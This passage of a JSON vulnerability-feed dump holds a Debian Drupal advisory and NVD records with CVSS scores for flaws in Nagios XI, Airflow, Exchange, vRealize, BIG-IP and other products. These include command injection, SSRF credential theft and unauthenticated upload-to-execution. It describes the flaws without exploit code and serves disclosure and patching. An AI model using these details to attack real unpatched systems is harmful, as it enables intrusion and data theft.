vulnerabilities were discovered in Drupal, a fully-featured content\nmanagement framework.\n\n\n* [CVE-2020-13666](https://security-tracker.debian.org/tracker/CVE-2020-13666)\nThe Drupal AJAX API did not disable JSONP by default, which could\n lead to cross-site scripting.\n\n\nFor setups that relied on Drupal's AJAX API for JSONP requests,\n either JSONP will need to be reenabled, or the jQuery AJAX API will\n have to be used instead.\n\n\nSee the upstream advisory for more details:\n <https://www.drupal.org/sa-core-2020-007>\n* [CVE-2020-13671](https://security-tracker.debian.org/tracker/CVE-2020-13671)\nDrupal failed to sanitize filenames on uploaded files, which could\n lead to those files being served as the wrong MIME type, or being\n executed depending on the server configuration.\n\n\nIt is also recommended to check previously uploaded files for\n malicious extensions. For more details see the upstream advisory:\n <https://www.drupal.org/sa-core-2020-012>\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n7.52-2+deb9u12.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFor the detailed security status of drupal7 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/drupal7>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-19T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2022-08-05T05:18:57", "id": "OSV:DLA-2458-1", "href": "https://osv.dev/vulnerability/DLA-2458-1", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:44:43", "description": "octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-26T19:15:00", "type": "cve", "title": "CVE-2021-32648", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-07-02T20:00:00", "cpe": [], "id": "CVE-2021-32648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32648", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-05-23T15:43:36", "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T08:15:00", "type": "cve", "title": "CVE-2021-40870", "cwe": ["CWE-436"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2021-40870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40870", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:29:24", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25297", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25297"], "modified": "2023-03-01T02:15:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25297", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:29:24", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25298", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25298"], "modified": "2023-03-01T02:15:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:18", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-22991", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-22991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22991", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:29:24", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25296", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2023-03-01T02:15:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25296", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:34:38", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T00:15:00", "type": "cve", "title": "CVE-2020-11978", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:apache:airflow:1.10.10"], "id": "CVE-2020-11978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11978", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:airflow:1.10.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:19:57", "description": "The System Information Library for Node.JS (npm package \"systeminformation\") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T17:15:00", "type": "cve", "title": "CVE-2021-21315", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-03-25T18:41:00", "cpe": ["cpe:/a:apache:cordova:10.0.0"], "id": "CVE-2021-21315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21315", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:cordova:10.0.0:*:*:*:*:-:*:*"]}, {"lastseen": "2023-06-05T14:40:22", "description": "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T16:15:00", "type": "cve", "title": "CVE-2020-13927", "cwe": ["CWE-1188"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2020-13927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13927", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-23T15:29:20", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-33766", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-16T14:41:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-33766", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:46", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:vrealize_operations_manager:8.2.0", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.0.1.1"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:39:40", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T16:15:00", "type": "cve", "title": "CVE-2020-13671", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-01T18:19:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33"], "id": "CVE-2020-13671", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:43:22", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 